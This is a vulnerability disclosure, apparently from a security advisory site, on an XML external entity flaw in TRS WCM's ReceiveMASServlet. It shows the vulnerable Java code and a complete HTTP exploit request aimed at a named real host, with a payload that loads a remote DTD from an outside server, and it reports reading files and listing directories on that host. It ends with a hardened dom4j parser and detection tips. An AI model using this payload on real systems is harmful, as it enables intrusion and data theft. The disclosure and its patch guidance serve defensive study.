### Brief description:

This appears to be a feature added in a later update; it affects the newer versions across the board.

### Detailed description:

It is still XML entity injection, but this time the XML is parsed with DOM.

The Servlet ReceiveMASServlet configured in web.xml:

```
<servlet>
    <servlet-name>ReceiveMASServlet</servlet-name>
    <servlet-class>com.trs.components.video.ReceiveMASServlet</servlet-class>
</servlet>
<servlet-mapping>
    <servlet-name>ReceiveMASServlet</servlet-name>
    <url-pattern>/app/video/ReceiveMASServlet</url-pattern>
</servlet-mapping>
```

The corresponding code in com/trs/components/video/ReceiveMASServlet.java is as follows:

```
protected void service(HttpServletRequest request, HttpServletResponse response)
        throws ServletException, IOException {
    String event = request.getParameter("event");
    String string = request.getParameter("pushInfo");
    LOG.info("push event: " + event);
    LOG.info("push pushInfo: " + string);
    if (string != null) {
        Element root = SimpleConsoleLogger.parserXml(string); // XML parsing entry point
        if (root.element("time") != null || "time".equals(root.element("time"))) {
            // ... remainder of the method not included in the original report
        }
    }
}
```

It takes the value of the pushInfo parameter and hands it to SimpleConsoleLogger.parserXml() to be parsed as XML; that method is as follows:

```
public static Element parserXml(String fileName) {
    Element root = null;
    try {
        System.out.println("filename:" + fileName);
        Document document = DocumentHelper.parseText(fileName); // DOM parsing of the XML
        root = document.getRootElement();
    } catch (DocumentException e) {
        e.printStackTrace();
    }
    return root;
}
```

The code above calls DocumentHelper.parseText() to parse the XML (the parameter is named fileName, but it receives the raw XML string from the request).

As before, send the following request directly with Burp Suite:

```
POST /wcm/app/video/ReceiveMASServlet HTTP/1.1
Host: cms.ce.cn
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=70C0A254A8662618477A7C2C709C614A
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 101

pushInfo=<!DOCTYPE+root+[<!ENTITY+%25+remote+SYSTEM+"http%3a//ip/1.xml">%25remote%3b]>
```

Because the default JDK shipped with TRS WCM is older than 1.7, the external DTD 1.xml can use the gopher protocol to drive operations such as reading files and listing directories. Testing against cms.ce.cn as an example, listing a directory:

![1.png](https://images.seebug.org/upload/201510/102342261e75937457bf3977186290bbe1f72884.png)

Reading the file config.xml:

![2.png](https://images.seebug.org/upload/201510/10234718214b174cc38abc1b1bd696cc7d639169.png)

### Proof of vulnerability:

Same as above.
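As an added illustration (not code from the original report or from TRS WCM), the hardened counterpart of parserXml(): the same dom4j library, but parsing through a SAXReader whose underlying SAX parser is told to refuse DOCTYPE declarations and never to resolve external entities or DTDs, so a pushInfo value of the shape shown above is rejected instead of fetched. The parserXml name and the dom4j API come from the page; the feature URIs are the standard Xerces/SAX feature names, and the sample inputs in main() are constructed for this example.

```java
import java.io.StringReader;

import org.dom4j.Document;
import org.dom4j.DocumentException;
import org.dom4j.Element;
import org.dom4j.io.SAXReader;
import org.xml.sax.SAXException;

public class SafeXmlParser {

    // Hardened replacement for SimpleConsoleLogger.parserXml(): DocumentHelper.parseText()
    // gives no control over entity handling, so build the SAXReader explicitly.
    public static Element parserXml(String xml) throws DocumentException {
        SAXReader reader = new SAXReader();
        try {
            // Refusing any DOCTYPE is the strongest setting: it blocks both a classic
            // <!ENTITY x SYSTEM "file:..."> and the parameter-entity form (%remote;)
            // used in the report's pushInfo payload.
            reader.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
            // Defence in depth in case the installed parser ignores the feature above.
            reader.setFeature("http://xml.org/sax/features/external-general-entities", false);
            reader.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
            reader.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        } catch (SAXException e) {
            // Fail closed: a parser that cannot disable entity resolution must not see untrusted input.
            throw new DocumentException("cannot configure XML parser securely", e);
        }
        Document document = reader.read(new StringReader(xml));
        return document.getRootElement();
    }

    // Constructed sample inputs (not from the report): a benign push message and one
    // carrying an external parameter entity, the shape of the payload described above.
    public static void main(String[] args) {
        String benign = "<root><time>2015-10-10 23:42:00</time></root>";
        String withDoctype = "<!DOCTYPE root [<!ENTITY % remote SYSTEM \"http://example.invalid/1.xml\">%remote;]><root/>";
        try {
            System.out.println("benign root element: " + parserXml(benign).getName());
            parserXml(withDoctype);
            System.out.println("UNEXPECTED: DOCTYPE input was accepted");
        } catch (DocumentException e) {
            System.out.println("rejected as expected: " + e.getMessage());
        }
    }
}
```

The second call throws before any network or file access happens, which is the behaviour to verify after patching; the unparsed pushInfo value logged by LOG.info() is also a useful detection point for DOCTYPE or ENTITY strings arriving at this endpoint.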